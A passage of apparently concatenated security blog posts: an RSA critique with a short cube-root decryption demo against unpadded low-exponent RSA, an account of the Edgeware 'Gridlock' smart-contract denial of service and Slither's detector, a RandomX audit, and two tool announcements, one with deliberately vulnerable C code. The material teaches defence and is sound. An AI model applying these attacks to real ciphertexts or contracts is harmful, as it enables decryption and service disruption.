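    # Integer cube root by binary search.
    lo, hi = 0, 1 << ((n.bit_length() // 3) + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo

recovered = icbrt(C)
assert recovered == M
print(recovered.to_bytes(7, "big"))   # b'vanilla'
```

Proper padding expands every message to the full size of the modulus, which is exactly why this attack evaporates when padding is actually used.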

RSA signatures are equally brittle in the presence of low public exponents. In 2006, Bleichenbacher found an attack which allows attackers to forge arbitrary signatures in many RSA implementations, including the ones used by Firefox and Chrome. This means that any TLS certificate from a vulnerable implementation could be forged. This attack takes advantage of the fact that many libraries use a small public exponent and omit a simple padding verification check when processing RSA signatures. Bleichenbacher’s signature forgery attack is so simple that it is a commonly used exercise in cryptography courses.

Parameter Selection is Hard

The common denominator in all of these parameter attacks is that the domain of possible parameter choices is much larger than that of secure parameter choices. Developers are expected to navigate this fraught selection process on their own, since all but the public exponent must be generated privately. There are no easy ways to check that the parameters are secure; instead developers need a depth of mathematical knowledge that shouldn’t be expected of non-cryptographers. While using RSA with padding may save you in the presence of bad parameters, many people still choose to use broken padding or no padding at all.

Padding oracle attacks everywhere

As we mentioned above, just using RSA out of the box doesn’t quite work. For example, the RSA scheme laid out in the introduction would produce identical ciphertexts if the same plaintext were ever encrypted more than once. This is a problem, because it would allow an adversary to infer the contents of the message from context without being able to decrypt it. This is why we need to pad messages with some random bytes. Unfortunately, the most widely used padding scheme, PKCS #1 v1.5, is often vulnerable to something called a padding oracle attack.

Padding oracles are pretty complex, but the high-level idea is that adding padding to a message requires the recipient to perform an additional check–whether the message is properly padded. When the check fails, the server throws an invalid padding error. That single piece of information is enough to slowly decrypt a chosen message. The process is tedious and involves manipulating the target ciphertext millions of times to isolate the changes which result in valid padding. But that one error message is all you need to eventually decrypt a chosen ciphertext. These vulnerabilities are particularly bad because attackers can use them to recover pre-master secrets for TLS sessions. For more details on the attack, check out this excellent explainer.

The original attack on PKCS #1 v1.5 was discovered way back in 1998 by Daniel Bleichenbacher. Despite being over 20 years old, this attack continues to plague many real-world systems today. Modern versions of this attack often involve a padding oracle slightly more complex than the one originally described by Bleichenbacher, such as one based on server response times or on a protocol downgrade in TLS. One particularly shocking example was the ROBOT attack, which was so bad that a team of researchers were able to sign messages with Facebook’s and PayPal’s secret keys. Some might argue that this isn’t actually RSA’s fault – the underlying math is fine, people just messed up an important standard several decades ago. The thing is, we’ve had a standardized padding scheme with a rigorous security proof, OAEP, since 1998. But almost no one uses it. Even when they do, OAEP is notoriously difficult to implement and is often vulnerable to Manger’s attack, which is another padding oracle attack that can be used to recover plaintext.

The fundamental issue here is that padding is necessary when using RSA, and this added complexity opens the cryptosystem up to a large attack surface. The fact that a single bit of information, whether the message was padded correctly, can have such a large impact on security makes developing secure libraries almost impossible. TLS 1.3 no longer supports RSA so we can expect to see fewer of these attacks going forward, but as long as developers continue to use RSA in their own applications there will be padding oracle attacks.

So what should you use instead?

People often prefer using RSA because they believe it’s conceptually simpler than the somewhat confusing DSA protocol or moon math elliptic curve cryptography (ECC). But while it may be easier to understand RSA intuitively, it lacks the misuse resistance of these other more complex systems.

First of all, a common misconception is that ECC is super dangerous because choosing a bad curve can totally sink you. While it is true that curve choice has a major impact on security, one benefit of using ECC is that parameter selection can be done publicly. Cryptographers make all the difficult parameter choices so that developers just need to generate random bytes of data to use as keys and nonces. Developers could theoretically build an ECC implementation with terrible parameters and fail to check for things like invalid curve points, but they tend to not do this. A likely explanation is that the math behind ECC is so complicated that very few people feel confident enough to actually implement it. In other words, it intimidates people into using libraries built by cryptographers who know what they’re doing. RSA on the other hand is so simple that it can be (poorly) implemented in an hour.

Second, any Diffie-Hellman based key agreement or signature scheme (including elliptic curve variants) does not require padding and therefore completely sidesteps padding oracle attacks. This is a major win considering RSA has had a very poor track record avoiding this class of vulnerabilities.

Trail of Bits recommends using Curve25519 for key exchange and digital signatures. Encryption needs to be done using a protocol called ECIES which combines an elliptic curve key exchange with a symmetric encryption algorithm. Curve25519 was designed to entirely prevent some of the things that can go wrong with other curves, and is very performant. Even better, it is implemented in libsodium, which has easy-to-read documentation and is available for most languages.

Seriously, stop using RSA

RSA was an important milestone in the development of secure communications, but the last two decades of cryptographic research have rendered it obsolete. Elliptic curve algorithms for both key exchange and digital signatures were standardized back in 2005 and have since been integrated into intuitive and misuse-resistant libraries like libsodium. The fact that RSA is still in widespread use today indicates both a failure on the part of cryptographers for not adequately articulating the risks inherent in RSA, and also on the part of developers for overestimating their ability to deploy it successfully.

The security community needs to start thinking about this as a herd-immunity problem—while some of us might be able to navigate the extraordinarily dangerous process of setting up or implementing RSA, the exceptions signal to developers that it is in some way still advisable to use RSA. Despite the many caveats and warnings on StackExchange and Github READMEs, very few people believe that they are the ones who will mess up RSA, and so they proceed with reckless abandon. Ultimately, users will pay for this. This is why we all need to agree that it is flat out unacceptable to use RSA in 2019. No exceptions.

Avoiding Smart Contract “Gridlock” with Slither

A denial-of-service (DoS) vulnerability, dubbed ‘Gridlock,’ was publicly reported on July 1st in one of Edgeware’s smart contracts deployed on Ethereum. As much as $900 million worth of Ether may have been processed by this contract. Edgeware has since acknowledged and fixed the “fatal bug.”

When we heard about Gridlock, we ran Slither on the vulnerable and fixed Edgeware contracts. Its publicly available dangerous-strict-equality detector correctly identifies the dangerous assertion in the vulnerable contract, and shows the absence of this vulnerability in the fixed contract.

This blog post details why this vulnerability is so subtle, the implementation details behind Slither’s dangerous-strict-equality detector that identified this vulnerability, and how Slither can help prevent developers from introducing such vulnerabilities in the future.

Strict Equality and DoS Vulnerability

The Gridlock vulnerability was identified in the snippet below. Upon discovery, the bug was acknowledged by the maintainers and a second version addressing the issue was deployed.

    /**
     * @dev        Locks up the value sent to contract in a new Lock
     * @param      term         The length of the lock up
     * @param      edgewareAddr The bytes representation of the target edgeware key
     * @param      isValidator  Indicates if sender wishes to be a validator
     */
    function lock(Term term, bytes calldata edgewareAddr, bool isValidator)
        external
        payable
    {
        uint256 eth = msg.value;
        address owner = msg.sender;
        uint256 unlockTime = unlockTimeForTerm(term);
        // Create ETH lock contract
        Lock lockAddr = (new Lock).value(eth)(owner, unlockTime);
        // ensure lock contract has all ETH, or fail
        assert(address(lockAddr).balance == msg.value); // BUG
        emit Locked(owner, eth, lockAddr, term, edgewareAddr, isValidator, now);
    }

Specifically, the source of this vulnerability is the assertion which performs a strict equality check between the balance of the newly created Lock contract and the msg.value sent to this contract.

From the contract developer’s perspective, this assertion should hold. The new Lock contract was just created in the previous line. Also, it was credited with an Ether value equal to the msg.value sent as part of the current transaction.

However, this assumes that the newly created Lock contract address will have zero Ether balance before its creation. This is incorrect. Ether can be sent to contract addresses before the contracts are instantiated at those addresses. This is possible because Ethereum address generation is based on deterministic nonces.

The DoS attack consists of pre-calculating the next Lock contract address and sending some Wei to that address. This forces the lock() function to fail at the assertion in all future transactions, bringing the contract to a “Gridlock.”

The fix is to replace the assertion with the one below, where the strict equality ‘==’ is replaced by ‘>=’, accounting for Ether already present at the address of the new Lock contract being created.

assert(address(lockAddr).balance >= msg.value);

Avoiding strict equality when determining whether an account has enough Ether or tokens is a well-understood defensive programming technique in Solidity.

Slither’s Dangerous-Strict-Equality Detector

Slither has had a publicly available dangerous-strict-equality detector targeting this vulnerability since version 0.5.0, released on January 14th, 2019. We classify results from this detector as Medium impact and High confidence because strict equality is nearly always misused in logic fundamental to the operation of the contract. The results of this check are worth reviewing closely!

Running Slither on the Lockdrop.sol contract immediately identifies the vulnerable assertion:

$ slither --detect incorrect-equality Lockdrop.sol 
Lockdrop.lock(Lockdrop.Term,bytes,bool) (Lockdrop.sol#53-67) uses a dangerous strict equality:
        - assert(bool)(address(lockAddr).balance == msg.value)
INFO:Slither:Lockdrop.sol analyzed (2 contracts), 1 result(s) found

This detector is implemented using a lightweight taint analysis, where the tainted sources are program constructs involving msg.value, now, block.number, block.timestamp, and the results of ERC token balanceOf() function calls. The taint sinks are expressions using strict equality comparisons, i.e., ‘==’. The analysis works on Slither’s intermediate language representation, SlithIR, and tracks the propagation of tainted values across assignments and function calls. An alert is generated when a taint sink has a data dependency on a tainted source.
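The idea can be illustrated with a heavily simplified sketch (a toy model of our own, not Slither's actual code or SlithIR's real structure):

```python
# Heavily simplified illustration of the detector's idea: seed a set of
# tainted names, propagate taint through assignments, and flag any strict
# equality whose operands depend on a tainted source.
TAINT_SOURCES = {"msg.value", "now", "block.number", "block.timestamp"}

# A tiny straight-line "program" as (kind, dest, operands) tuples,
# standing in for SlithIR operations.
program = [
    ("assign", "eth", ["msg.value"]),          # uint256 eth = msg.value;
    ("assign", "bal", ["lockAddr.balance"]),
    ("eq",     None,  ["bal", "msg.value"]),   # the dangerous assertion
    ("eq",     None,  ["owner", "expected"]),  # untainted: no alert
]

def find_dangerous_equalities(ops):
    tainted = set(TAINT_SOURCES)
    alerts = []
    for kind, dest, operands in ops:
        if kind == "assign" and any(o in tainted for o in operands):
            tainted.add(dest)                  # taint flows through assignment
        elif kind == "eq" and any(o in tainted for o in operands):
            alerts.append(operands)            # tainted value reaches a '==' sink
    return alerts

print(find_dangerous_equalities(program))      # [['bal', 'msg.value']]
```

The real analysis additionally follows taint across function calls and works on an SSA-like form, which is what lets it catch patterns a textual search would miss.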

A simple textual search might have caught this vulnerability, but syntactic regular expressions would raise a fog of false alerts or miss it entirely. This is because of the many ways this vulnerability pattern can manifest, including across function calls and variable assignments. Hardcoding such a regular expression is challenging. Other security tools lack a detector for this vulnerability, or produce a substantial number of false positives. The lightweight semantic taint analysis enabled by SlithIR greatly improves this detector’s accuracy and reduces false positives.

In the case of the Lockdrop contract, Slither’s dangerous-strict-equality detector generates such an alert because msg.value and an address balance are used in a strict equality comparison within an assertion. This is a textbook example of a strict equality vulnerability which is caught effortlessly by Slither. We also verified that this alert is not present in the recently fixed code.

Besides this detector, Slither has 35 more that catch many Solidity smart contract vulnerabilities. They work together with 30 additional proprietary detectors in our continuous assurance system (think “Travis-CI but for Ethereum”). So, go ahead and give Slither a shot. We would love to hear about your experience, and welcome feedback.

State of the Art Proof-of-Work: RandomX

RandomX is a new ASIC and GPU-resistant proof-of-work (PoW) algorithm originally developed for Monero, but potentially useful in any blockchain using PoW that wants to bias towards general purpose CPUs. Trail of Bits was contracted by Arweave to review this novel algorithm in a two person-week engagement and provide guidance on alternate parameter selection. But what makes it unusual and why should you care about it?

Standard Proof-of-work

In classical PoW algorithms (such as hashcash, used in Bitcoin), the core is typically a cryptographic hash function where the only variable is the data input to the function. To achieve a target “hardness” a number of zero bits are required as the prefix of the hash output. Each zero bit added doubles the difficulty of mining. However, this type of algorithm is highly amenable to acceleration via ASICs and GPUs because a fixed set of operations are performed on all input with limited memory requirements. This is undesirable.
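A hashcash-style inner loop can be sketched in a few lines (illustrative Python, not Bitcoin's actual implementation):

```python
import hashlib

# Hashcash-style mining sketch: vary a nonce until the SHA-256 of the data
# has the required number of leading zero bits. Every extra zero bit doubles
# the expected work, while the verifier needs only one hash.
def mine(data: bytes, difficulty_bits: int) -> int:
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        h = hashlib.sha256(data + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(h, "big") < target:   # leading bits are all zero
            return nonce
        nonce += 1

nonce = mine(b"block header", 12)     # ~2^12 hash attempts expected
digest = hashlib.sha256(b"block header" + nonce.to_bytes(8, "big")).digest()
assert int.from_bytes(digest, "big") >> (256 - 12) == 0
```

The loop body is a fixed hash over a small input, which is precisely why it maps so well onto ASICs and GPUs.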

Why do we care about ASIC resistance?

Blockchain mining is ideally a heavily decentralized task with no singular entity controlling a significant amount of the hashing power. Blockchains are susceptible to 51% attacks, where a malicious majority can override the global state, e.g., allowing double-spends. If an ASIC can be built that significantly improves mining efficiency over a general purpose CPU, then economic factors will disincentivize CPU-based mining. The result of this can be seen in the Bitcoin network, where ASIC manufacturers have built large-scale mining farms and a handful of entities control a shockingly high percentage of the hash rate.

For the last several years, ASIC manufacturers have shown great capacity for rapid design and fabrication of ASICs. A project that wants to be ASIC-resistant (without switching to a proof-of-stake model, which has its own set of tradeoffs) must therefore seek to take advantage of the specific strengths a general-purpose CPU possesses over a hypothetical ASIC.

This desire has led to a significant amount of research around ASIC resistance. RandomX represents a concrete implementation of the most modern ASIC-resistant ideas as applied to cryptocurrency.

How RandomX works

The core of RandomX is the concept of randomized execution. Put simply, we want to execute a series of random instructions to take advantage of a general-purpose CPU’s flexibility with dynamic code execution. The RandomX developers have extensively documented their design rationale and provided a specification with a more rigorous explanation, but with some simplification the algorithm does the following:

Step 1

A data structure called the Cache is created using argon2d with the input key K. Argon2d was originally designed as a memory-hard password hashing function. Computers generally have large pools of fast memory available to them, but memory is expensive on an ASIC. Requiring large amounts of memory is one of the most common defenses against specialized hardware. Argon2 uses a variety of techniques to ensure that a large (configurable) quantity of memory is used and that any time/memory tradeoff attacks are ineffective. You can read more about them in the argon2 specification.

Step 2

The Dataset (a read-only memory structure) is expanded from the Cache. Datasets are designed to be a large segment of memory that contain data the virtual machine will read. There are two values that control the size of the Dataset (RANDOMX_DATASET_BASE_SIZE and RANDOMX_DATASET_EXTRA_SIZE). Together, they place an upper bound on the total memory the algorithm requires. Extra size is used to push the memory slightly beyond a power of two boundary, which makes life harder for ASIC manufacturers. The actual Dataset generation is performed by loading data from the Cache, generating a set of SuperscalarHash instances, and then invoking those instances to get a final output. SuperscalarHash is designed to consume power while waiting for data from DRAM. This hurts an ASIC that attempts to compute Datasets dynamically from the Cache.

Step 3

The Scratchpad (read/write memory) is initialized by performing a blake2 hash on the input data and using the resulting output to seed the AesGenerator, which fills the Scratchpad using AES transformations. These transformations are already hardware-accelerated on modern CPUs via AES-NI instructions, so an ASIC gains no advantage by implementing them. The Scratchpad itself is a (relatively) large read/write data structure designed specifically to fit in the caches available on CPUs.

Step 4

Now we get to the core of the algorithm: the randomized programs running on a virtual machine. The VM is executed by building a program using random bytes created using another generator. The RandomX virtual machine architecture is carefully designed to allow any sequence of 8-byte words to be a valid instruction. These instructions are designed to:

  • Require double precision floating point operations
  • Use 128-bit vector math
  • Use all four IEEE 754 floating point rounding modes
  • Read and write to the Scratchpad, which as previously stated is designed to fit entirely in CPU caches and thus be very fast
  • Take advantage of branch prediction via a low probability branch instruction
  • Execute instructions using the superscalar and out-of-order execution capabilities of a CPU

Each of these properties is a particular strength of general-purpose CPUs and requires additional die area to implement on an ASIC, reducing its advantage.

The resulting state of the VM after program execution is hashed and used to generate a new program. The number of loops executed in this fashion is configurable but is set to eight by default. This looping behavior was chosen to avoid situations where an ASIC miner might only implement a subset of possible operations and only run “easy” programs on the virtual machine. Since the subsequent program cannot be determined until the current one has been fully executed, a miner cannot predict whether the entirety of the chain will be “easy,” so it becomes impractical to implement a partial set of instructions.
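The chaining can be caricatured in a few lines of Python (a drastic simplification of our own, bearing no resemblance to RandomX's real instruction set or VM):

```python
import hashlib

# Toy picture of the chaining in steps 4-5: each loop derives a "program"
# from a hash, executes it against a small register state, and hashes the
# result to derive the next program. Because program i+1 depends on the full
# execution of program i, a miner cannot peek ahead and skip hard programs.
def run_program(seed: bytes, regs: list[int]) -> list[int]:
    # Interpret successive seed bytes as toy instructions on 64-bit registers.
    for i, b in enumerate(seed):
        op = b & 3
        r = i % len(regs)
        if op == 0:
            regs[r] = (regs[r] + b) % 2**64                        # add
        elif op == 1:
            regs[r] = (regs[r] * 6364136223846793005 + b) % 2**64  # mul-add
        elif op == 2:
            regs[r] ^= b << (i % 56)                               # xor
        else:
            regs[r] = (regs[r] >> 1) | ((regs[r] & 1) << 63)       # rotate
    return regs

state = hashlib.blake2b(b"input data").digest()
regs = [0] * 8
for _ in range(8):                       # eight chained programs, as in RandomX
    regs = run_program(state, regs)
    packed = b"".join(r.to_bytes(8, "big") for r in regs)
    state = hashlib.blake2b(packed).digest()

print(state.hex()[:16])                  # final PoW-style digest prefix
```

In the real algorithm each "program" is hundreds of instructions exercising the floating point units, caches, and branch predictor, but the sequential dependency between programs is the same.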

Step 5

Finally, the Scratchpad and Register File (the virtual machine’s registers) are hashed using AesHash followed by a final blake2 hash. This step offers no significant ASIC resistance beyond the use of AES instructions, but is included to show the final hashing to a 64-byte value.

What we found

In the course of our two person-week review we found three issues (two low severity, one informational).

Single AES rounds used in AesGenerator

The AES encryptions described by the RandomX specification refer to a single round of AES, which is insufficient for full mixing of the input data. RandomX doesn’t depend on the encryption of AES for its security. Instead, AES is used as a CPU-biased fast transformation that provides diffusion across the output. However, diffusion of bits through the output is dependent upon the number of rounds of AES.

The severity of this finding is “low” because exploiting the lack of diffusion requires finding additional bias in almost every step of the algorithm, and then crafting an input that can propagate that bias through the entire chain.

Subsequent to the disclosure of this finding, the RandomX team developed a new AesGenerator4R function that performs four rounds. This functionality has been merged into RandomX as of pull request 46. Four rounds as part of program generation resolves the concerns documented in this issue.

Insufficient Testing and Validation of VM Correctness

The RandomX codebase lacks test coverage validating the semantics of the virtual machine (VM). Trail of Bits devoted half of this engagement (one person-week) to assessing the general security properties of the algorithm implementation. While this effort revealed several code-quality findings, it was insufficient to validate the absence of semantic errors in the VM implementation.

The severity of this finding is “low” because the correctness of RandomX is irrelevant as long as: (1) its output is deterministic, (2) its output is cryptographically random, and (3) its reference implementation is the sole one used for mining in a blockchain. However, any discrepancy between the specification and the reference implementation can lead to consensus issues and forks in the blockchain.

Consider the case where a third-party cleanroom implementation of the RandomX specification becomes popular on a blockchain using RandomX for proof-of-work. The blockchain will fork—potentially at some distant point in the past—if there is even a subtle semantic difference between the miners’ implementations.

Configurable parameters are brittle

RandomX contains 47 configurable parameters, including flags for parallelization, the memory consumption and iteration count of the initial KDF, the memory size of the dataset, the sizes of the three levels of cache for the virtual CPU, the size and iteration count of programs executed on the VM, and cache access/latency. The default parameters were chosen to maximize the algorithm’s CPU advantage. However, the threat of 51% attacks forces alternate blockchains interested in using RandomX to make different choices for these parameters, without clear insight into which changes may compromise the algorithm’s advantages. This brittleness could impede third-party adoption.

Subsequent to this finding, the RandomX team has removed a few unnecessary parameters, written additional guidance about which configuration values are safe to change, and added checks that prohibit a set of unsafe configurations.

Assessment depth

There is a belief in the blockchain industry that many small reviews are a better use of review capital than one large one. This belief is predicated on the notion that each review team will approach the codebase differently and apply different expertise. The supposed diversity of approaches and expertise will provide better coverage and shake out more bugs than having a single team do a deep dive on a given project.

We believe that larger, singular assessments provide better overall value to the client. As a customer, you are paying the assessment team to provide their expert opinion, but, like any new employee, they need time to ramp up on your codebase. Once that initial learning period is complete, the quality and depth of the assessment rapidly increases. Many large-scale, long-term code assessments do not reveal their most critical or meaningful findings until late in the engagement.

As a client, you should hire a single firm for a larger engagement rather than multiple firms for smaller ones, for precisely the same reasons you place value on employee retention: replacing a firm that has accumulated domain knowledge will cost you time and money.

This principle of software assurance is captured well in an old talk from Dave Aitel: The Hacker Strategy. Namely, the quality of vulnerabilities a researcher can find is strongly correlated with the time spent. One hour nets you extremely shallow problems; one week, significantly more depth; and with one month, you can find vulnerabilities that no one else is likely to discover.

This is further discussed in Zero Days, Thousands of Nights — the authoritative reference on vulnerability research based on dozens of interviews with experts in the field:

The method of finding vulnerabilities can have an impact on which vulnerabilities are actually found. As one example, recent research claims that fuzzers find only the tip of the iceberg in terms of vulnerabilities (Kirda et al., no date). Vulnerabilities can be found via fuzzing in newer or less mature products, or those with simple code bases. For products that have a longer life, are more complex, are popular with a large market share, or are high revenue generators, more people have evaluated the code bases, and finding vulnerabilities often requires more in-depth auditing, logic review, and source code analysis, in order to go several layers deep.

For example, manually validating the correctness of the RandomX VM (the most serious issue we discovered) would take several person-weeks on its own. Even at the end of all four audits, there will likely be no guarantee that the VM implementation is free of semantic errors.

Similarly, analyzing the cryptographic strength of each function in RandomX was achievable within the engagement, but exploring whether there exist methods to propagate potential bias across steps requires a deeper look. Small engagements prohibit this type of work, favoring shallower results.

Current project status

Our two person-week audit was the first of multiple reviews the RandomX team has scheduled. Over the next few weeks the project is undergoing three additional small audits, the results of which should be published later this month. Once these audits are published and any additional findings are resolved by the RandomX authors, it is the intent of both Arweave and Monero to adopt this algorithm in their respective products in a scheduled protocol upgrade.

Siderophile: Expose your Crate’s Unsafety

Today we released a tool, siderophile, that helps Rust developers find fuzzing targets in their codebases.

Siderophile trawls your crate’s dependencies and attempts to find every unsafe function, expression, trait method, etc. It then traces these up the callgraph until it finds the function in your crate that uses the unsafety. Finally, it ranks the functions it finds in your crate by badness: the more unsafety a function makes use of, the higher its badness rating.

Siderophile ([ˈsidərəˌfīl]) – Having an affinity for metallic iron

We created Siderophile for an engagement where we were delivered a massive Rust codebase with a tight timeframe for review. We wanted to fuzz it but weren’t even sure where to start. So, we created a tool to determine which functions invoked the most unsafe behavior. We were able to speed up our bug discovery by automating the targeting process with siderophile. We’re now open-sourcing this tool so everyone can benefit from it!

Sample Output

Here is a sample of siderophile when run on molasses, a crate we’re building that implements the MLS cryptographic protocol:

Badness  Function
    012  molasses::crypto::hash::HashFunction::hash_serializable
    005  molasses::crypto::hash::HashContext::feed_serializable
    003  molasses::utils::derive_node_values
    003  molasses::application::encrypt_application_message
    003  molasses::application::decrypt_application_message
    003  molasses::group_ctx::GroupContext::new_from_parts
    003  molasses::group_ctx::GroupContext::from_welcome
    003  molasses::group_ctx::GroupContext::update_transcript_hash
    003  molasses::group_ctx::GroupContext::update_tree_hash
    003  molasses::group_ctx::GroupContext::update_epoch_secrets
    003  molasses::group_ctx::GroupContext::apply_update

As you can see, much of the unsafety comes from the serialization and crypto-heavy routines. We’ll be sure to fuzz this bad boy before it goes 1.0.


This is not guaranteed to catch all the unsafety in a crate’s deps. For instance, we can’t inspect macros or resolve dynamically dispatched methods, since unsafe tagging only occurs at the source level. The ergonomics of the tool could be better, and we’ve already identified some incorrect behavior on certain crates. If you’re interested in helping out, please do! We are actively maintaining the project and have some issues written out.

Try it Out

Siderophile is on GitHub along with a better explanation of how it works and how to run the tool. You should run it on your Rust crate and set up fuzzers for what it finds. Check it out!

Finally, thanks to cargo-geiger and rust-praezi for establishing current best practices. This project builds directly on their work.

Use constexpr for faster, smaller, and safer code

With the release of C++14, the standards committee strengthened one of the coolest modern features of C++: constexpr. Now, C++ developers can write constant expressions and force their evaluation at compile-time, rather than at every invocation by users. This results in faster execution, smaller executables and, surprisingly, safer code.

Undefined behavior has been the source of many security bugs, such as the Linux kernel privilege escalation CVE-2009-1897 and myriad poorly implemented integer overflow checks that compilers remove because they rely on undefined behavior. When designing constexpr, the C++ standards committee decided that code marked constexpr cannot invoke undefined behavior. For a comprehensive analysis, read Shafik Yaghmour’s fantastic blog post, “Exploring Undefined Behavior Using Constexpr.”

I believe constexpr will evolve into a much safer subset of C++. We should embrace it wholeheartedly. To help, I created a libclang-based tool to mark as much code as possible as constexpr, called constexpr-everything. It automatically applies constexpr to conforming functions and variables.

Constexpr when confronted with undefined behavior

Recently in our internal Slack channel, a co-worker was trying to create an exploitable binary where the vulnerability was an uninitialized stack local, but he was fighting the compiler. It refused to generate the vulnerable code.

/* clang -o example example.cpp -O2 -std=gnu++14 \
   -Wall -Wextra -Wshadow -Wconversion */
typedef void (*handler)();

void handler1();
void handler2();
void handler3();

handler handler_picker(int choice) {
    handler h;  // uninitialized: undefined behavior if no case matches
    switch(choice) {
    case 1:
        h = handler1;
        break;
    case 2:
        h = handler2;
        break;
    case 3:
        h = handler3;
        break;
    }

    return h;
}

When compiling the example code with a modern compiler (clang 8.0), the compiler silently eliminates the vulnerable cases. If the caller specifies a choice not handled by the switch (such as 0 or 4), the function returns handler2. This is true on optimization levels greater than -O0. Try it for yourself on Compiler Explorer!

My default set of warnings (-Wall -Wextra -Wshadow -Wconversion) doesn’t warn about this on clang at all (Try it). It prints a warning on gcc but only with optimizations enabled (-O0 vs -O1)!

Note: If you want to print all the warnings clang knows about, use -Weverything on clang when developing.

The reason for this is, of course, undefined behavior. Since undefined behavior can’t occur in a valid program, the compiler is free to make assumptions about the code; in this case, it assumes the handler h can never be read while uninitialized.

Right now the compiler silently accepts this bad code and just assumes we know what we’re doing. Ideally, it would error out. This is where constexpr saves us.

/* clang -o example example.cpp -O2 -std=gnu++14 \
   -Wall -Wextra -Wshadow -Wconversion */
typedef void (*handler)();

void handler1();
void handler2();
void handler3();

constexpr handler handler_picker(int choice) {
    handler h;
    switch(choice) {
    case 1:
        h = handler1;
        break;
    case 2:
        h = handler2;
        break;
    case 3:
        h = handler3;
        break;
    }

    return h;
}
<source>:9:13: error: variables defined in a constexpr function must be initialized
    handler h;

1 error generated.
Compiler returned: 1

constexpr forced an error here, which is what we want. It works on most forms of undefined behavior but there are still gaps in the compiler implementations.

constexpr everything!

After some digging in the clang source, I realized that I can use the same machinery libclang uses to determine if something can be constexpr during its semantic analysis to automatically mark functions and methods as constexpr. While this won’t detect more undefined behavior directly, it will help us mark as much code as possible as constexpr.

Initially I started writing a clang-tidy pass, but ran into trouble with the available APIs and the context available in the pass. I decided to create my own stand-alone tool: constexpr-everything. It is available on our GitHub and should work with recent libclang versions.

I wrote two visitors: one for functions and one for variables. The function visitor tries to identify whether a function can be marked constexpr. This turned out to be fairly straightforward: I iterate over all the clang::FunctionDecls in the current translation unit and ask whether they can be evaluated in a constexpr context with clang::Sema::CheckConstexprFunctionDecl, clang::Sema::CheckConstexprFunctionBody, and clang::Sema::CheckConstexprParameterTypes. I skip over functions that are already constexpr or can’t be (like destructors or main). When the analysis detects a function that can be constexpr but isn’t already, it issues a diagnostic and a FixIt:

$ ../../../build/constexpr-everything ../test02.cpp
constexpr-everything/tests/02/test02.cpp:13:9: warning: function can be constexpr
        X(const int& val) : num(val) {
constexpr-everything/tests/02/test02.cpp:17:9: warning: function can be constexpr
        X(const X& lVal)
constexpr-everything/tests/02/test02.cpp:29:9: warning: function can be constexpr
        int getNum() const { return num; }
3 warnings generated.

FixIts can be automatically applied with the -fix command line option.

Trouble applying constexpr variables

We need to mark variables as constexpr in order to force evaluation of constexpr functions. Automatically applying constexpr to functions is easy. Doing so on variables is quite difficult. I had issues with variables that weren’t previously marked const getting marked const implicitly through the addition of constexpr.

After trying to apply constexpr as widely as possible and fighting with my test cases, I switched tactics and went with a much more conservative approach: only mark variables that are already const-qualified and have constexpr initializers or constructors.

$ ../../../build/constexpr-everything ../test02.cpp -fix
constexpr-everything/tests/02/test02.cpp:47:5: warning: variable can be constexpr
const X x3(400);

constexpr-everything/tests/02/test02.cpp:47:5: note: FIX-IT applied suggested code changes
1 warnings generated.

While this approach won’t apply constexpr in every case possible, it can safely apply it automatically.

Try it on your code base

Benchmark your tests before and after running constexpr-everything. Not only will your code be faster and smaller, it’ll be safer. Code marked constexpr can’t bitrot as easily.

constexpr-everything is still a prototype – it has a couple of rough edges left. The biggest issue is FixIts only apply to the source (.cpp) files and not to their associated header files. Additionally, constexpr-everything can only mark existing constexpr-compatible functions as constexpr. We’re working on using the machinery provided to identify functions that can’t be marked due to undefined behavior.

The code is available on our GitHub. To try it yourself, you’ll need cmake, llvm and libclang. Try it out and let us know how it works for your project.